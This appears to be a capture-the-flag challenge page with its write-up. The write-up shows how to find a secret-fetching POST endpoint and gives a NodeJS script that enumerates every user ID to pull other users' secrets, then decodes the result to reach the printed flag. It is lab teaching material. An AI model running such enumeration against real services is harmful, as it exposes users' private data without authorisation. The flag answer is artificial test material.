- Published: 04/27/2024 (#11/14 in round)
- Category: WebEx/Cryptography
- Points: 120
- Author: kshau
Secrets can sometimes be leaked...
This hint costed 10 points.
Reveal hint
Check the "Network" tab in dev browser tools and reload the page.
Reveal write-up
- Upon opening the website, visit the
Networktab in dev browser tools and reload the page - This should reveal a POST request being made to the
/RequestAfterRequest/getSecretendpoint with the payload and response shown below
Payload:
{"user": "354"}Response:
{"secret": "(blank)"}- Use this same POST request to write a script that POST requests every user's secret (1,834 total users as shown on the site)
- The example shown below is a script written in NodeJS
const {fetch} = require("undici");
async function getUserSecret(user) {
const res = await fetch("https://csd.shaurya.pro/RequestAfterRequest/getSecret", {
"headers": {
"content-type": "application/json"
},
"body": JSON.stringify({"user": user}),
"method": "POST"
});
const json = await res.json();
const {secret} = json;
return secret;
}
(async () => {
for (var i = 0; i <= 1834; i++) {
const secret = await getUserSecret(i.toString());
console.log(`Checking secret of user ${i}`)
if (secret != "(blank)") {
console.log(secret);
break;
}
}
})()- The code should check every user's secret, and should output a long base64 string after checking the 1,372th user
- Go to CyberChef
- Input the base64 string in the
Inputfield - Next to the
Outputfield label, click the magic wand icon - This will reveal an image with the flag on it
Flag: csd{NC1_15_510W1Y_8UrN1N6_M3_411V3}
Write-up by kshau